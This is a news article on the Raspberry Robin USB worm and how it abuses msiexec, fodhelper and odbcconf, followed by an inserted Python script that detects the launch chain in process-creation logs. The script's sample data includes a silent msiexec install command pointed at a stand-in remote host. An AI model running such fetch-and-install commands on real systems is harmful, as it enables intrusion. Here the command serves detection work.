Raspberry Robin: a dangerous worm on Windows networks

Microsoft discovered a Windows worm in the networks of hundreds of organizations from various industries.

The malware, called Raspberry Robin, spreads via infected USB devices and was first detected in September 2021 by Red Canary analysts.


Security firm Sekoia found the same worm using QNAP NAS devices as command and control (C2) servers in early November [PDF], while Microsoft said it discovered malicious packages linked to this worm created in 2019.

Redmond's findings are very much in line with those of Red Canary's Detection Engineering team, which also detected this worm in several of its customers' networks.

Although Microsoft observed the malware connecting to addresses on the Tor network, the attackers have not yet acted on the access they already have to their victims' computers.

The malware can bypass User Account Control (UAC) on infected systems by abusing legitimate Windows tools.

As we already mentioned, Raspberry Robin spreads to Windows systems via infected USB drives containing a malicious .LNK file.

Once the USB device is connected and the user clicks the shortcut (the .LNK file), the worm spawns an msiexec process via cmd.exe to launch a malicious file stored on the infected USB drive.

It infects new Windows devices, communicates with command and control (C2) servers, and runs malicious packages using various Windows utilities:

  • fodhelper (a trusted Windows executable),
  • msiexec (Windows Installer command line component),
  • and odbcconf (a tool for configuring ODBC drivers).
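The launch chain described above (cmd.exe spawning msiexec, then the auto-elevating utilities fodhelper and odbcconf) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article, Microsoft or Red Canary: it runs three simple rules over a handful of constructed, Sysmon-style process-creation events and then correlates the hits per host so that the full chain stands out from a lone, possibly benign, msiexec run. The CSV field names, the "expected parents" baseline for fodhelper/odbcconf, and the remote-URL heuristic for msiexec are assumptions made for the example, not details from the article.

```python
import csv
import io
import ntpath

# Constructed sample of process-creation events (simplified Sysmon Event ID 1
# fields as CSV). These rows are made up for this example; they are not real
# telemetry. Host WS-017 shows the chain the article describes, WS-022 does not.
SAMPLE_EVENTS = r"""ts,host,parent_image,image,command_line
2021-11-02T09:14:01Z,WS-017,C:\Windows\explorer.exe,C:\Windows\System32\cmd.exe,cmd.exe /c start msiexec /q /i http://example.invalid/pkg.msi
2021-11-02T09:14:02Z,WS-017,C:\Windows\System32\cmd.exe,C:\Windows\System32\msiexec.exe,msiexec /q /i http://example.invalid/pkg.msi
2021-11-02T09:14:05Z,WS-017,C:\Windows\System32\msiexec.exe,C:\Windows\System32\fodhelper.exe,fodhelper.exe
2021-11-02T09:14:06Z,WS-017,C:\Windows\System32\fodhelper.exe,C:\Windows\System32\odbcconf.exe,odbcconf.exe
2021-11-02T10:00:00Z,WS-022,C:\Windows\explorer.exe,C:\Windows\System32\msiexec.exe,msiexec /i C:\Users\alice\Downloads\setup.msi
2021-11-02T10:05:00Z,WS-022,C:\Windows\explorer.exe,C:\Windows\System32\cmd.exe,cmd.exe /c dir
"""

# Parents from which fodhelper/odbcconf are normally started in this example's
# assumed environment baseline; anything else is treated as unexpected.
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe", "services.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (C:\\a\\b.exe -> b.exe)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the names of the rules an event matches (empty list if benign)."""
    hits = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmdline = event["command_line"].lower()

    # Rule 1: cmd.exe spawning msiexec, the launch chain the article describes.
    if parent == "cmd.exe" and image == "msiexec.exe":
        hits.append("cmd_spawns_msiexec")

    # Rule 2: msiexec pointed at a remote package (general heuristic, assumed
    # for this example; not a detail taken from the article).
    if image == "msiexec.exe" and ("http://" in cmdline or "https://" in cmdline):
        hits.append("msiexec_remote_package")

    # Rule 3: the auto-elevating utilities the article names, started from a
    # parent outside the assumed baseline.
    if image in {"fodhelper.exe", "odbcconf.exe"} and parent not in EXPECTED_PARENTS:
        hits.append(f"{image[:-4]}_unexpected_parent")

    return hits


def detect(events_csv):
    """Run every event through classify(); return (ts, host, rule, image) tuples."""
    findings = []
    for row in csv.DictReader(io.StringIO(events_csv)):
        for rule in classify(row):
            findings.append((row["ts"], row["host"], rule, basename(row["image"])))
    return findings


def hosts_with_chain(findings):
    """Hosts where the cmd->msiexec launch AND an unexpected-parent hit both occur.

    A single msiexec run is common; the combination with fodhelper/odbcconf
    from an odd parent is what matches the chain described in the article.
    """
    by_host = {}
    for _ts, host, rule, _image in findings:
        by_host.setdefault(host, set()).add(rule)
    return {
        host
        for host, rules in by_host.items()
        if "cmd_spawns_msiexec" in rules
        and any(r.endswith("_unexpected_parent") for r in rules)
    }


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for ts, host, rule, image in found:
        print(f"{ts} {host} {rule:<28} {image}")
    print("hosts with full chain:", sorted(hosts_with_chain(SAMPLE_EVENTS and found)))
```

Run stand-alone, the script prints four rule hits, all on WS-017, and reports that host as the only one with the complete chain; the local msiexec install on WS-022 produces no alert. In a real deployment the same rules would be expressed in the SIEM or EDR query language and the baseline of expected parents tuned to the environment.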

The security researchers who discovered Raspberry Robin have not yet identified where it came from but are still looking for the malicious developers' digital footprints.

Microsoft has already labeled this campaign "high risk," since the attackers can download and deploy additional malware on their victims' networks and could begin causing damage at any time.


Written by giorgos
